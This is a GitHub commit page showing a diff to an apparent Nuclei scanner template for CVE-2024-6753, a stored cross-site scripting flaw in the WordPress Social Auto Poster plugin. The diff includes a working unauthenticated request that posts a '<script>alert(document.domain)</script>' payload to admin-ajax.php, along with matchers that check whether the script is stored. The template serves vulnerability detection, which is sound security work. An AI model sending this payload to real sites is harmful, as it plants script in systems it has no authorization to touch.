Skip to content

Commit a9c066b

Browse files
authored
Merge pull request #14688 from Sechunt3r/patch-21
Fix CVE-2024-6753 YAML configuration
2 parents b788774 + 5b73b5c commit a9c066b

File tree

1 file changed

+12
-13
lines changed

1 file changed

+12
-13
lines changed

http/cves/2024/CVE-2024-6753.yaml

Lines changed: 12 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -11,9 +11,9 @@ info:
1111
remediation: |
1212
Update to the latest version of the plugin where the vulnerability is fixed.
1313
reference:
14-
- https://nvd.nist.gov/vuln/detail/CVE-2024-6753
1514
- https://www.wordfence.com/threat-intel/vulnerabilities/id/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2
1615
- https://patchstack.com/database/vulnerability/social-auto-poster/wordpress-social-auto-poster-plugin-5-3-14-unauthenticated-stored-cross-site-scripting-vulnerability
16+
- https://nvd.nist.gov/vuln/detail/CVE-2024-6753
1717
classification:
1818
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
1919
cvss-score: 7.2
@@ -28,44 +28,44 @@ info:
2828
fofa-query: body="social-auto-poster"
2929
tags: cve,cve2024,wordpress,wp,wp-plugin,social-auto-poster,xss,vkev
3030

31-
flow: http(1) && http(2) && http(3) && http(4)
31+
flow: (http(1) && http(2)) || (http(3) && http(4))
3232

3333
http:
3434
- raw:
3535
- |
36-
POST /wp-admin/admin-ajax.php HTTP/1.1
36+
GET / HTTP/1.1
3737
Host: {{Hostname}}
38-
Content-Type: application/x-www-form-urlencoded
39-
X-Requested-With: XMLHttpRequest
40-
41-
action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
4238
4339
matchers:
4440
- type: dsl
4541
dsl:
42+
- 'contains(body, "/wp-content/plugins/")'
4643
- 'status_code == 200'
47-
- 'contains(body, "\"status\":\"success\"")'
4844
condition: and
4945
internal: true
5046

5147
- raw:
5248
- |
53-
GET /wp-login.php HTTP/1.1
49+
POST /wp-admin/admin-ajax.php HTTP/1.1
5450
Host: {{Hostname}}
51+
Content-Type: application/x-www-form-urlencoded
52+
53+
action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
5554
5655
matchers:
5756
- type: dsl
5857
dsl:
58+
- 'contains(body, "{\"status\":\"success\"}")'
59+
- 'contains(content_type, "text/html")'
5960
- 'status_code == 200'
60-
- 'contains(header, "wordpress_test_cookie")'
6161
condition: and
62-
internal: true
6362

6463
- raw:
6564
- |
6665
POST /wp-login.php HTTP/1.1
6766
Host: {{Hostname}}
6867
Content-Type: application/x-www-form-urlencoded
68+
Cookie: wordpress_test_cookie=WP+Cookie+check
6969
7070
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
7171
@@ -88,5 +88,4 @@ http:
8888
- 'contains(body, "<script>alert(document.domain)</script>")'
8989
- 'contains(content_type, "text/html")'
9090
- 'status_code == 200'
91-
condition: and
92-
# digest: 4b0a00483046022100c6aa05f7b3bf88b27f989ca835570d53b04d3a1c40d557b186fd25f253840aea022100ffb63d8fa3f4c8199170034adad3ebd1d4d819e583fc2fcd7f4e26894cd829ac:922c64590222798bb761d5b6d8e72950
91+
condition: and

0 commit comments

Comments
 (0)